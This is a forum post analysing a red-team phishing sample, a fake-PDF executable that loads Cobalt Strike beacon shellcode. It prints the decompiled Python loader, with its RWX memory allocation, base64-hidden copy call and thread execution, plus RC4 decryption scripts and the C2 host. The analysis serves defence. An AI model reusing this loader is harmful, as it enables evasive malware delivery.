Pcgho Tech Forum (电脑疯子技术论坛 | 电脑极客社区)

2021 HW: analysis of a red-team sample, with its AV-evading shellcode loader
0x01 The original email and the sample

During the HW exercise, the internal mail gateway received a phishing email.

The original email is shown in two screenshots in the original post.

Unzipping the attachment yields the sample (note the double extension, an .exe posing as a PDF):
财险内部旅游套餐方案.pdf.exe
The sample is 5.88 MB; its hashes are:
MD5: 5bc32973b43593207626c0588fc6247e
SHA-1: 551414cb283a56cf55817c720c2efee0144ea2ed
SHA-256: d12e852eeefa87e75c7876fb53947b979bfbf880eb825eb58b9fe7f0132809ad
VirusTotal detection is 14/69, so its evasion is fairly effective.


Yara rules identify it as a typical Cobalt Strike x64 https beacon payload.


Judging from the program's size and the functions recovered by reverse engineering, the sample is a shellcode loader written in Python that loads Cobalt Strike https beacon x64 shellcode, then packaged with py2exe.


Unpacking the program with unpy2exe and decompiling it recovers the source:

```python
# uncompyle6 version 3.7.4
# Python bytecode 3.7
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: py36test.py
import ctypes, urllib, base64, requests, hashlib

def shellCodeLoad(shellcode):
    # 12288 = 0x3000 = MEM_COMMIT | MEM_RESERVE, 64 = 0x40 = PAGE_EXECUTE_READWRITE:
    # an RWX allocation the size of the shellcode
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)),
                                              ctypes.c_int(12288), ctypes.c_int(64))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    # The base64 string keeps the copy call out of plain string scans; it decodes to
    # ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
    eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=='))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr),
                                                 ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

def rc4(text, key):
    key = hashlib.md5(key).hexdigest()   # the RC4 key is the 32-char hex MD5 of the password
    text = base64.b64decode(text)        # outer base64 layer
    result = ''
    key_len = len(key)
    box = list(range(256))
    j = 0
    for i in range(256):                 # key-scheduling algorithm
        j = (j + box[i] + ord(key[(i % key_len)])) % 256
        box[i], box[j] = box[j], box[i]
    i = j = 0
    for element in text:                 # keystream generation and XOR
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        # the forum rendering showed "box + box[j]" here: the "[i]" was swallowed by the board's markup
        k = chr(element ^ box[((box[i] + box[j]) % 256)])
        result += k
    return result

if __name__ == '__main__':
    # b is the RC4-encrypted, base64-encoded beacon shellcode embedded in the sample;
    # the long base64 blob is omitted from this write-up
    b = '...'
    mm = 'king6666'
    c = rc4(b, mm.encode('utf-8'))
    code = bytearray(base64.b64decode(c))   # inner base64 layer yields the raw shellcode
    shellCodeLoad(code)
```

The analysis shows that the sample RC4-decrypts the base64-encoded shellcode,

then allocates memory with VirtualAlloc, copies the shellcode into it and executes it.

Decryption script:

```python
import base64, hashlib

def rc4(text, key):
    key = hashlib.md5(key).hexdigest()   # same key derivation as the sample: hex MD5 of the password
    text = base64.b64decode(text)
    result = ''
    key_len = len(key)
    box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + box[i] + ord(key[(i % key_len)])) % 256
        box[i], box[j] = box[j], box[i]
    i = j = 0
    for element in text:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        k = chr(element ^ box[((box[i] + box[j]) % 256)])   # box[i], lost in the forum rendering
        result += k
    return result

# paste the base64 string b from the decompiled sample here (omitted from this write-up)
b = '...'
mm = 'king6666'
c = rc4(b, mm.encode('utf-8'))
code = bytearray(base64.b64decode(c))
print(code)
```

Running it recovers the shellcode (the dump is shown as a screenshot in the original post).

The callback address is www.alibababaa.com,
and the shellcode is a typical Cobalt Strike https x64 beacon.
That concludes the analysis.
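As an added example (not code from the original post), the following Python reimplements the sample's unwrapping scheme on bytes (outer base64, RC4 keyed with the hex MD5 of the password, inner base64), builds a constructed test vector in the forward direction, and scans the recovered buffer for printable strings, which is how the callback host surfaces from the real decrypted shellcode. The constructed payload, `wrap_payload`, `unwrap_payload` and `printable_strings` are this example's own; only the password and the layering come from the sample.

```python
import base64
import hashlib
import re

def rc4(data: bytes, key: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA) over bytes; the sample keys it with the hex MD5 of the password."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def sample_key(password: str) -> bytes:
    # The loader does hashlib.md5(key).hexdigest() and uses the 32 hex characters as the RC4 key.
    return hashlib.md5(password.encode()).hexdigest().encode()

def unwrap_payload(blob: str, password: str) -> bytes:
    """Reverse the sample's layering: base64 -> RC4 -> base64 -> raw payload bytes."""
    inner = rc4(base64.b64decode(blob), sample_key(password))
    return base64.b64decode(inner)

def wrap_payload(raw: bytes, password: str) -> str:
    """Same layering in the forward direction; used here only to build a test vector."""
    inner = base64.b64encode(raw)
    return base64.b64encode(rc4(inner, sample_key(password))).decode()

def printable_strings(data: bytes, min_len: int = 6) -> list:
    """Runs of printable ASCII, the quick way to spot a C2 host in a decrypted buffer."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

# Constructed stand-in for the decrypted payload (not shellcode): a marker plus the
# callback host the analysis recovered, so the string scan has something to find.
FAKE_PAYLOAD = b"\x00\x01CONSTRUCTED-PAYLOAD\x00www.alibababaa.com\x00\xff"
PASSWORD = "king6666"   # the hard-coded password from the decompiled sample

def demo() -> list:
    blob = wrap_payload(FAKE_PAYLOAD, PASSWORD)      # what would sit in the sample's variable b
    recovered = unwrap_payload(blob, PASSWORD)
    assert recovered == FAKE_PAYLOAD                 # round trip through the sample's scheme
    return printable_strings(recovered)

if __name__ == "__main__":
    print(demo())   # ['CONSTRUCTED-PAYLOAD', 'www.alibababaa.com']
```

To run it against the real sample, replace the test vector with the base64 string from the decompiled source and pass it to `unwrap_payload`.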

© 2008-2022 Pcgho Inc.